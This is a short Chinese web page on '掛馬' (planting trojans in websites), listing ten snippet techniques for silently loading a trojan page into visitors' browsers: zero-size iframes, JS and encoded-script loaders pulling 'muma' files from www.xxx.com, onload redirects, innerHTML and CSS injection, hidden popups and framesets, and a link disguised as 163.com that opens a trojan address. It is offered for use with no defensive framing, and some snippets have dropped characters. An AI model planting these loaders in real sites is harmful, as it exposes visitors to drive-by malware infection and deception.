掛馬

一:框架掛馬 
<iframe src=地址 width=0 height=0></iframe> 



二:js文件掛馬 
首先將以下代碼 
document.write("<iframe width=&#39;0&#39; height=&#39;
&#39; src=&#39;地址&#39;></iframe>"); 
保存爲xxx.js, 
則JS掛馬代碼爲 
<script language=javascript src=xxx.js></script> 



三:js變形加密 
<SCR
PT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script> 
muma.txt可改成任意後綴 



四:body掛馬 
<body onload="
indow.location=&#39;地址&#39;;"></body> 



五:隱蔽掛馬 
top.document.body.innerHTML = top.document.body.innerHTML + &#39;/r/n<iframe sr
="http://www.xxx.com/muma.htm/"></iframe>&#39;; 



六:css中掛馬 
body { 
background-image: url(&#39;javascript:document.write("
script src=http://www.XXX.net/muma.js></script>")&#39;)} 



七:JAJA掛馬 
<SCRIPT language=javascript> 
window.open ("地址","
,"toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 
</script> 



八:圖片僞裝

<html> 
<iframe src="網馬地址" height=0 width=0></iframe> 
<img src="圖片地址"></center> 
</html> 

九:僞裝調用: 
<frameset
rows="444,0" cols="*"> 
<frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">

<frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> 
</frameset> 

十:高級欺

<a href="http://www.163.com(迷惑連接地址,顯示這個地址指向木馬地址)" onMouseOver="www_163_com(); return true;"> 頁面要顯示的內容 </a> 
<SCRIP
Language="JavaScript"> 
function www_163_com () 

var url="網馬地址"; 
open(url,"NewWindow","toolbar=no,location=no
directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10"); 


</SCRIPT>

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章